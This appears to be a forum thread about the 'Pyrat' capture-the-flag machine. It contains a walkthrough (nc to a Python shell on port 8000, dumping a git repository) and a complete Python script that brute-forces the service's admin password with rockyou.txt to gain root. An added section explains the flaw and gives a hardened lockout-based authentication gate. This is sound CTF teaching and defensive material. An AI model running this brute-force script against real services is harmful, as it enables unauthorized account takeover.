Pyrat Discussion

Let’s discuss Pyrat

Test your enumeration skills on this boot-to-root machine.

1 Like

Machine rooted, I’ll post writeup later on.

For Initial Foothold, try connecting to the port you found using nc.

and no the nc session isn’t hanging :slight_smile:

1 Like

this is all you need

2 Likes

Here is the writeup for those interested.

Writeup

Initial Foothold

After running nmap, we’ll get 22 (ssh) and 8000. Connecting to http://IP_ADDRESS:8000/ will ask us to use a basic connection, which refers to sockets. Using nc to connect to that port with nc IP 8000 will get us into a python environment where we can either get a reverse shell or just type shell.

Root Privilege Escalation

Once on the box, we can find a .git directory under /opt/dev. Hosting a python web server on the target machine and using git-dumper to pull it to our host will give us the source code. Looking through the git logs we can find the GitHub account where the source code for PyRAT is published.

GitHub - josemlwdf/PyRAT: PyRAT is a powerful CTF (Capture The Flag) rootkit designed to be used in cybersecurity competitions and educational settings. It provides various capabilities for privilege escalation, and maintaining persistent access on compromised systems.

Looking through the source code we came across an “admin” command; once typed in the python env, it will ask for a password. In the source code there is a password, but it doesn’t work, so the idea here is to create a python script that will try to brute-force the admin password.

import socket

# Define the target IP and port
target_ip = 'Target_Machine_IP'
target_port = 8000

# Load the wordlist of passwords in binary mode (rockyou.txt is not valid UTF-8 throughout)
with open('/usr/share/wordlists/rockyou.txt', 'rb') as f:
    passwords = f.readlines()

for password in passwords:
    # Strip the newline and decode, dropping any bytes that are not valid UTF-8
    # (errors='ignore' never raises, so no try/except is needed here)
    password = password.strip().decode('utf-8', errors='ignore')
    if not password:
        continue

    # One fresh connection per attempt; the context manager closes the socket on
    # every path, including the 'break' on success and any socket error
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            s.settimeout(5)
            s.connect((target_ip, target_port))

            # Send the 'admin' command and wait for the password prompt
            s.sendall(b"admin\n")
            response = s.recv(1024).decode(errors='ignore')

            if "password" in response.lower():
                print(f"Trying password: {password}")
                s.sendall(password.encode() + b"\n")

                # Read the response from the server after the password attempt
                response = s.recv(1024).decode(errors='ignore')

                # Check if the password is correct
                if "welcome admin" in response.lower():
                    print(f"Success! Password is: {password}")
                    break
                else:
                    print(f"Password {password} is incorrect.")
            else:
                print("No password prompt received.")
        except (socket.timeout, OSError) as e:
            print(f"Connection problem while trying {password}: {e}")

We only need to execute the script using python3 script_name.py and we’ll get the password, which we can use to get a root shell!

And that’s it :slight_smile:

2 Likes
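The writeup above works because the service’s “admin” command compares a plaintext secret and accepts an unlimited number of guesses over fresh connections. The following is an added example, not code from the PyRAT project or from the writeup, showing that weak pattern beside the gate a defender would put in front of such a socket service: a salted PBKDF2 hash instead of a stored plaintext, a constant-time comparison, and a per-client failure counter with a lockout window. The secret value, client labels and the injectable clock are constructed for the example.

```python
# Added example (not PyRAT's code and not from the forum post): an authentication
# gate for a command-over-socket service, weak form beside hardened form.
import hashlib
import hmac
import os
import time

PBKDF2_ROUNDS = 100_000  # iteration count for the demo; raise for production

# --- Weak pattern: what the writeup's loop exploits ----------------------------
# Plaintext secret in source, compared with ==, and no limit on attempts.
WEAK_SECRET = "constructed-demo-secret"  # constructed value for this example


def weak_check(attempt: str) -> bool:
    """Unlimited, non-constant-time comparison against a plaintext secret."""
    return attempt == WEAK_SECRET


# --- Hardened pattern ------------------------------------------------------------
def hash_secret(secret: str, salt: bytes = None):
    """Return (salt, digest) so only a salted PBKDF2 hash is kept, not the secret."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


class AuthGate:
    """Per-client attempt limiting plus constant-time verification.

    `clock` is injectable (default time.monotonic) so the lockout window can be
    exercised deterministically in tests.
    """

    def __init__(self, salt, digest, max_attempts=5, lockout_seconds=300,
                 clock=time.monotonic):
        self.salt = salt
        self.digest = digest
        self.max_attempts = max_attempts
        self.lockout_seconds = lockout_seconds
        self.clock = clock
        self.failures = {}  # client id (e.g. peer address) -> (count, last_failure_time)

    def check(self, client: str, attempt: str) -> str:
        """Return 'ok', 'denied' or 'locked' for one password attempt."""
        count, last = self.failures.get(client, (0, 0.0))
        now = self.clock()
        if count >= self.max_attempts:
            if now - last < self.lockout_seconds:
                return "locked"  # still inside the lockout window: do not even hash
            count = 0            # window expired, start counting again

        candidate = hashlib.pbkdf2_hmac("sha256", attempt.encode(), self.salt,
                                        PBKDF2_ROUNDS)
        # compare_digest does not leak the position of the first mismatching byte
        if hmac.compare_digest(candidate, self.digest):
            self.failures.pop(client, None)
            return "ok"
        self.failures[client] = (count + 1, now)
        return "denied"


if __name__ == "__main__":
    salt, digest = hash_secret(WEAK_SECRET)
    gate = AuthGate(salt, digest, max_attempts=3, lockout_seconds=60)
    for guess in ["123456", "password", "qwerty", WEAK_SECRET]:
        print(guess, "->", gate.check("192.0.2.10", guess))  # constructed client label
```

The hardened gate keys its counter on the client identity, so a single peer reconnecting for every guess, as the writeup’s script does, is locked out after `max_attempts` failures rather than being handed a fresh prompt each time; the lockout check runs before the PBKDF2 call so a locked client cannot also burn server CPU.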